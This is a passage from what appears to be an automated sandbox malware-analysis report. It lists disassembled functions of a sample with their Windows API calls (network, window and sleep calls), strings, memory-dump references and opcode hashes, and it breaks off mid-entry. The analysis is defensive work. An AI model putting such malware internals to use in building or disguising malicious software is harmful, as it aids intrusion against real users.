                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID: &
                                                                                              • API String ID: 2931989736-1010288
                                                                                              • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                              • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                              • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                              • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                              Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: \
                                                                                              • API String ID: 4104443479-2967466578
                                                                                              • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                              • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                              • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                              • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                              Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00466825
                                                                                              • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CrackInternet_wcslen
                                                                                              • String ID: |
                                                                                              • API String ID: 596671847-2343686810
                                                                                              • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                              • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                              • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                              • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                              Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                              • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                              • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                              • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                              Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strlen.LIBCMT ref: 0040F858
                                                                                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                              • _sprintf.LIBCMT ref: 0040F9AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_sprintf_strlen
                                                                                              • String ID: %02X
                                                                                              • API String ID: 1921645428-436463671
                                                                                              • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                              • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                              • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                              • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                              Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Combobox
                                                                                              • API String ID: 3850602802-2096851135
                                                                                              • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                              • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                              • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                              • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                              Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                              • String ID: edit
                                                                                              • API String ID: 2978978980-2167791130
                                                                                              • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                              • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                              • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                              • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                              Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 2783356886-2766056989
                                                                                              • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                              • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                              • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                              • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                              Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: htonsinet_addr
                                                                                              • String ID: 255.255.255.255
                                                                                              • API String ID: 3832099526-2422070025
                                                                                              • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                              • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                              • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                              • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                              Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InternetOpen
                                                                                              • String ID: <local>
                                                                                              • API String ID: 2038078732-4266983199
                                                                                              • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                              • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                              • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                              • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                              Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 1988441806-3962188686
                                                                                              • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                              • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                              • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                              • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                              Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: u,D
                                                                                              • API String ID: 4104443479-3858472334
                                                                                              • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                              • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                              • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                              • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                              Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • wsprintfW.USER32 ref: 0045612A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend_mallocwsprintf
                                                                                              • String ID: %d/%02d/%02d
                                                                                              • API String ID: 1262938277-328681919
                                                                                              • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                              • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                              • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                              • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                              Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                              • InternetCloseHandle.WININET ref: 00442668
                                                                                                • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                              • String ID: aeB
                                                                                              • API String ID: 857135153-906807131
                                                                                              • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                              • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                              • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                              • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                              Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                              • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                              Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                              Strings
                                                                                              Memory Dump Source
